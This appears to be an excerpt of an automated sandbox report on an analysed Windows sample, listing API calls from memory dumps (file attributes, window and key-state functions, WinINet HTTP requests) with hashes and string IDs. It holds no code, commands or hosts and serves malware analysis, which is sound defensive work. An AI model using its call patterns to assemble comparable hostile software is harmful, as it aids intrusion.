                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C689F2
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68A06
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C68A30
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C68A4A
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68A5C
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68AA5
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C68AF5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 15ab3beabb872437f5e0e9ccec569893acf494d169544ab709d8f50a27daced6
                                                                                                                                                                                                                                                                            • Instruction ID: bb26ea9ac3eeb14d245dce42f67774584c54a6c776761166aeb1a105a20f07cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab3beabb872437f5e0e9ccec569893acf494d169544ab709d8f50a27daced6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD81D1719083049BCB34EF54C494ABEB3E8BF88310F584A1AF995D7291DF34DA49DB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00BF74D7
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: GetClientRect.USER32(?,?), ref: 00BF758D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: GetWindowRect.USER32(?,?), ref: 00BF75CE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: ScreenToClient.USER32(?,?), ref: 00BF75F6
                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00C36083
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C36096
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C360A4
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C360B9
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C360C1
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C36152
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                            • Opcode ID: 863de6543ff812949a1757269dbe8c0c41c356210fb0d1df16f575e0cbdec582
                                                                                                                                                                                                                                                                            • Instruction ID: 7fae53aa2b966528c113d534c661f540d77ccaddd4f4a1f403e739f94462d109
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 863de6543ff812949a1757269dbe8c0c41c356210fb0d1df16f575e0cbdec582
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D71BE31500209EFCF259F64C885ABE7BB5FF48320F1486A9ED665B2A6C7318944EF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00C895C7
                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 00C895CD
                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 00C895D3
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00C8966E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C89681
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00C8975B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                            • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                            • Opcode ID: b103b0dc5595d6de39b67819c96bf5774b671e336b0329a9c002e78907577ae7
                                                                                                                                                                                                                                                                            • Instruction ID: cab50d7913ba19c1c2dac82bd39c296d22cdbbc8317ae07fd0a3d6cb9faddc28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b103b0dc5595d6de39b67819c96bf5774b671e336b0329a9c002e78907577ae7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74516670204304AFD704EF24CC56FBA77E4EB88714F400A69FA96972E2DB709A08DB56
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6CCB7
                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6CCDF
                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6CD0F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6CD67
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C6CD7B
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C6CD86
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: a028adc491412bcdd8e3065330657e978f2b9fe6e7c801058fcac1644be07889
                                                                                                                                                                                                                                                                            • Instruction ID: 19e283511daabd78bd1be784679f79c8133842bcab384c3ce5a29c548f65943f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a028adc491412bcdd8e3065330657e978f2b9fe6e7c801058fcac1644be07889
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21315C71600204AFD731AF6598C8BBB7BBCEB45740B10452AF496D2240DB34ED049BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C355AE,?,?,Bad directive syntax error,00C8DCD0,00000000,00000010,?,?), ref: 00C5A236
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C355AE,?), ref: 00C5A23D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C5A301
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                            • Opcode ID: d0e8162afd3a98116d8769754207db098a274c6bcb5d0438beae0d740b1f0d2e
                                                                                                                                                                                                                                                                            • Instruction ID: 3cfd90cf0bd17c7f50358b456543ed4159fd374a660fd11e7ffb4bb20c450ae0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0e8162afd3a98116d8769754207db098a274c6bcb5d0438beae0d740b1f0d2e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF214F3184021EAFCF15AFA0CC0AEEE7B79BF18700F044569BA15660A2EB719658DB15
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C529F8
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C52A0D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C52A9A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                            • Opcode ID: 4953df3b83067ed3f2072627357f4b4ac57ccc0f69771218bad8981d4a53ce00
                                                                                                                                                                                                                                                                            • Instruction ID: bee82d030ca601031609288e3e240d631e57dc2590695dcab64bedbe23939763
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4953df3b83067ed3f2072627357f4b4ac57ccc0f69771218bad8981d4a53ce00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511067A244307BAFA287621EC07EEA77ECCF16725F200022FD05E50D1FB65A9C47618
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00BF758D
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF75CE
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00BF75F6
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00BF773A
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF775B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5803451f07e9b989bb0f8d7d702f8b4c53e6e24c2e89b5a009b01eac07297ba4
                                                                                                                                                                                                                                                                            • Instruction ID: 20f0d735475d363ebbe5d11d03c95d76813bff50f8006a8957e2335e01476308
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5803451f07e9b989bb0f8d7d702f8b4c53e6e24c2e89b5a009b01eac07297ba4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43C1693891464AEBDB10CFA8C480BFEB7F1FF18310F14845AE9A5E3250DB34AA54DB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7e7e1cf9ae23df58c62aae153ebef929e2e1d1bbdf79a6a795ca32264fde60c7
                                                                                                                                                                                                                                                                            • Instruction ID: 5cbc1993f7f4db5727a09f24122c9d1254b7e360801ddc204707991d288c2aa1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e7e1cf9ae23df58c62aae153ebef929e2e1d1bbdf79a6a795ca32264fde60c7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41614971904330EFDB22EF75F881BAD7BA49F22320F14016DF857A7A92D6319E409B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C85C24
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00C85C65
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00C85C6B
                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C85C6F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C879F2: DeleteObject.GDI32(00000000), ref: 00C87A1E
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C85CAB
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C85CB8
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C85CEB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C85D25
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C85D34
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                            • Opcode ID: 295edfdaccf0deaf41072b2eb9526f94baa7dd97438e4cf0276f87aff91f242e
                                                                                                                                                                                                                                                                            • Instruction ID: 9a8a3247f75c7a1e2b293fcb98fe9c414e09945bbf83548d83468eb0a2d2dea6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 295edfdaccf0deaf41072b2eb9526f94baa7dd97438e4cf0276f87aff91f242e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B519430640A08BFEF24AF15CC49FA93BA5FB04758F144112FA259A1E1C7F69A90DF49
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C328D1
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C328EA
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C328FA
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C32912
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C32933
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BF11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C32942
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C3295F
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BF11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C3296E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4cb00d671c6207ef0d356d47ba2bfa755d35c90c59f3aeea0d31d7d77940ee16
                                                                                                                                                                                                                                                                            • Instruction ID: b91c865a0dc5bdc4682508b388ce282bbc50932f691ee02c6e7679de136a0d52
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb00d671c6207ef0d356d47ba2bfa755d35c90c59f3aeea0d31d7d77940ee16
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7515870610309EFDB24DF29CC85BAA7BF5EB88720F104958FA52976E0D770E994EB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6CBC7
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6CBDA
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C6CBEE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6CCB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: GetLastError.KERNEL32 ref: 00C6CD67
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: SetEvent.KERNEL32(?), ref: 00C6CD7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: InternetCloseHandle.WININET(00000000), ref: 00C6CD86
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2918673b9747b6b509081b722daf39a42b10775dee835ade81ba168ce54695a0
                                                                                                                                                                                                                                                                            • Instruction ID: a3a900025505b0930263461d3bbeecd06fc9828f3481751cdc8f2c8c46d305d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2918673b9747b6b509081b722daf39a42b10775dee835ade81ba168ce54695a0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316971601705BFDB319FA5DDC4B7ABBB8FF48300B04452DF9AA82650CB31E914ABA0
                                                                                                                                                                                                                                                                            APIs
